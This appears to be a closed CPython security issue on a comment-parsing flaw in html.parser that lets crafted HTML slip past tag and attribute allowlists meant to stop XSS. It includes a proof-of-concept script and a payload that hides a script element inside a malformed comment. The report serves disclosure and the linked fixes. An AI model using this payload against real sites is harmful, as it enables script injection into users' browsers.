Closed
Labels
- stdlib: Standard Library Python modules in the Lib/ directory
- type-security: A security issue
Description
The html.parser library allows an attacker to bypass any allowlist of HTML tags and attributes that is meant to mitigate XSS. This is possible because the parser does not correctly parse HTML comments in user input.
Vulnerability
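This vulnerability occurs because the parser does not handle HTML comments the way the HTML standard, and therefore a browser, does. For example, the standard treats `--!>` as a sequence that closes a comment, so the parser and the browser can disagree about where a comment ends and which markup after it is live.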
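To make the comment-closing rules concrete, here is a minimal sketch of where a comment ends under the HTML standard's tokenizer rules. The helper `comment_end` and both regular expressions are hypothetical names written for illustration; they are not part of html.parser and are not presented as the fix that was merged. The sketch assumes a comment is closed by `-->` or `--!>`, and that `<!-->` and `<!--->` are empty comments that close abruptly.

```python
import re

# Hypothetical helper for illustration only; not part of html.parser.
_COMMENT_CLOSE = re.compile(r"--!?>")  # "-->" or "--!>"
_ABRUPT_CLOSE = re.compile(r"-?>")     # the tail of "<!-->" or "<!--->"


def comment_end(markup, start=0):
    """Return the index just past the comment opening at `start`.

    Returns -1 if the comment is never closed.
    """
    if not markup.startswith("<!--", start):
        raise ValueError("no comment opens at this position")
    body = start + 4
    # An empty comment may be closed abruptly, right after "<!--".
    abrupt = _ABRUPT_CLOSE.match(markup, body)
    if abrupt:
        return abrupt.end()
    # Otherwise the first "-->" or "--!>" closes the comment.
    close = _COMMENT_CLOSE.search(markup, body)
    return close.end() if close else -1


# The payload from the proof of concept in this report.
payload = '<!--!> <h1 value="--!><script>alert(document.domain)</script>'
end = comment_end(payload)
print(repr(payload[:end]))  # the comment, as a browser would delimit it
print(repr(payload[end:]))  # markup left over after the comment
```

Under these rules the comment ends right after `--!>`, so the `<script>` element that follows is ordinary markup from the browser's point of view. A validator whose parser does not apply the same rules never sees that element as a tag.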
Exploitation
In this scenario, a developer parses user-supplied HTML and validates it against an allowlist of tags and attributes in order to prevent XSS attacks. A security check of this type can be bypassed because the parser does not parse HTML comments properly.
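The kind of check described here could look like the following minimal sketch. The class `AllowlistChecker`, the function `find_violations`, and the two allowlists are assumptions made for illustration; the report does not show a production validator. Such a check is only as reliable as the agreement between the parser and the browser on what counts as a tag.

```python
from html.parser import HTMLParser

# Hypothetical allowlists, chosen to mirror the tag and attribute
# used in the proof of concept.
ALLOWED_TAGS = {"h1"}
ALLOWED_ATTRS = {"alt"}


class AllowlistChecker(HTMLParser):
    """Record every tag or attribute that is not on the allowlist."""

    def __init__(self):
        super().__init__()
        self.violations = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.violations.append(("tag", tag))
        # attrs is a list of (name, value) pairs.
        for name, _value in attrs:
            if name not in ALLOWED_ATTRS:
                self.violations.append(("attr", name))


def find_violations(markup):
    checker = AllowlistChecker()
    checker.feed(markup)
    checker.close()  # flush any buffered input
    return checker.violations


print(find_violations('<h1 alt="title">Hello</h1>'))
print(find_violations('<h1 onclick="x()">Hi</h1><script>alert(1)</script>'))
```

The first call reports no violations, while the second reports the `onclick` attribute and the `script` tag. The bypass in this report does not target the allowlist logic itself: markup that the parser swallows as part of a comment never reaches `handle_starttag`, so it is never checked.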
poc.py
from html.parser import HTMLParser
from html.entities import name2codepoint
class MyHTMLParser(HTMLParser):
    def handle_starttag(self, tag, attrs):
        print("Start tag:", tag)
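        # Allowlist of tags: only <h1> is accepted
        print("Invalid tag:", tag != "h1")
        # attrs is a list of (name, value) pairs, so compare the name only
        for name, value in attrs:
            # Allowlist of attributes: only "alt" is accepted
            print("attr:", (name, value))
            print("Invalid attr:", name != "alt")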
    def handle_endtag(self, tag):
        print("End tag  :", tag)
    def handle_data(self, data):
        print("Data     :", data)
    def handle_comment(self, data):
        print("Comment  :", data)
    def handle_entityref(self, name):
        c = chr(name2codepoint[name])
        print("Named ent:", c)
    def handle_charref(self, name):
        if name.startswith('x'):
            c = chr(int(name[1:], 16))
        else:
            c = chr(int(name))
        print("Num ent  :", c)
    def handle_decl(self, data):
        print("Decl     :", data)
parser = MyHTMLParser()
parser.feed('<!--!> <h1 value="--!><script>alert(document.domain)</script>')
# HTML is safe, we can proceed
Evidence of exploitation
Expected behavior
System Information
- CPython versions tested on: Python 3.10.8
- Operating system and architecture: GNU/Linux x86_64
Linked PRs
- gh-102555 Increase HTML standard compliance for closing comment tags #117406
- gh-102555: Fix comment parsing in HTMLParser #135664
- [3.14] gh-102555: Fix comment parsing in HTMLParser according to the HTML5 standard (GH-135664) #136271
- [3.13] gh-102555: Fix comment parsing in HTMLParser according to the HTML5 standard (GH-135664) #136272
- [3.12] gh-102555: Fix comment parsing in HTMLParser according to the HTML5 standard (GH-135664) #136273
- [3.11] gh-102555: Fix comment parsing in HTMLParser according to the HTML5 standard (GH-135664) #136274
- [3.10] gh-102555: Fix comment parsing in HTMLParser according to the HTML5 standard (GH-135664) #136275
- [3.9] gh-102555: Fix comment parsing in HTMLParser according to the HTML5 standard (GH-135664) #136276

